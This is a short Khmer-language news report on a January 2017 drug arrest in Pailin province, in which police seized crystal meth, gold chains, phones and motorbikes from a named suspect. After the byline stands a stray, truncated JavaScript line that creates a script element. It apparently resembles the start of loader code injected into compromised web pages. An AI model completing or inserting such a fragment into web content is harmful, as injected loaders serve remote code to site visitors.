Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

នគរបាលខេត្តប៉ៃលិន ឃាត់ខ្លួនជនសង្ស័យម្នាក់ដកហូតថ្នាំគ្រឿងញៀន៣កញ្ចប់ធំ

ខេត្តប៉ៃលិន៖ លោកអនុសេនីយ៍ទោ អៀប វិសាល នាយរងការិយាល័យប្រឆាំងបទល្មើសគ្រឿងញៀន កាលពីវេលាម៉ោង៧និង​៣០នាទី ថ្ងៃទី០៩ ខែមករា ឆ្នាំ២០១៧បានដឹកនាំកម្លាំងចុះធ្វើការបង្ក្រាប ករណីជួញដូរ និងប្រើប្រាស់គ្រឿងញៀន ខុសច្បាប់មួយករណី ស្ថិតភូមិផ្សារព្រំ ឃុំស្ទឹងកាច់ ស្រុកសាលាក្រៅ ខេត្តប៉ៃលិន បានធ្វើការឃាត់ខ្លួនជនសង្ស័យបានម្នាក់ ឈ្មោះ យឺន វ៉ាន់នី (ហៅអាម៉ុល) ភេទប្រុស អាយុ៣០ឆ្នាំ មុខរបរ មិនពិតប្រាកដ បច្ចុប្បន្នរស់ភូមិសំបូរ ឃុំសាលាក្រៅ ស្រុកសាលាក្រៅ ខេត្តប៉ៃលិន រួមនឹងវត្ថុតាងមានម្សៅពណ៍សថ្លា (ICE) ចំនួន០៣កញ្ចប់ធំ, លោហធាតុព៌ណមាស (កាឡៃ) ចំនួន ០២ខ្សែ, ទូរស័ព្ទចំនួន ០២គ្រឿង, ម៉ូតូ ០៣គ្រឿង និងឧបករណ៍សម្រាប់ ជក់គ្រឿងញៀនមួយចំនួន។

បច្ចុប្បន្ន ជនសង្ស័យខាងលើត្រូវបានសមត្ថកិច្ចជំនាញ​ កំពុងកសាងសំនុំរឿងដើម្បីចាត់ការទៅតាមផ្លូវច្បាប់។ដោយ៖ញ៉ឹប បូរី

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More